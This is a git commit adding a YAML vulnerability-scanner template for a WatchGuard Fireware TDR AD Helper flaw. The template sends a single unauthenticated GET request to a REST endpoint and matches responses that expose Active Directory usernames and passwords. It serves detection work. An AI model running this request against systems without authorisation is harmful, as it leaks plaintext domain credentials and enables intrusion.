Create watchguard-fireware-ad-helper-component-credentials-disclosure.yaml

a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-12-09 16:02:48 +09:00 · 2021-12-09 16:02:48 +09:00 · bde4e1815a
parent 60a5636de7
commit bde4e1815a
1 changed files with 23 additions and 0 deletions
--- a/vulnerabilities/other/watchguard-fireware-ad-helper-component-credentials-disclosure.yaml
+++ b/vulnerabilities/other/watchguard-fireware-ad-helper-component-credentials-disclosure.yaml
@ -0,0 +1,23 @@
+id: watchguard-fireware-ad-helper-component-credentials-disclosure
+
+info:
+  name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
+  author: gy741
+  severity: critical
+  description: a credential-disclosure vulnerability in the AD Helper component of the WatchGuard Fireware Threat Detection and Response (TDR) service, which allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
+  reference: https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
+  tags: watchguard,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
+
+    matchers:
+      - type: word
+        words:
+          - "fullyQualifiedName"
+          - "logonDomain"
+          - "username"
+          - "password"
+        condition: and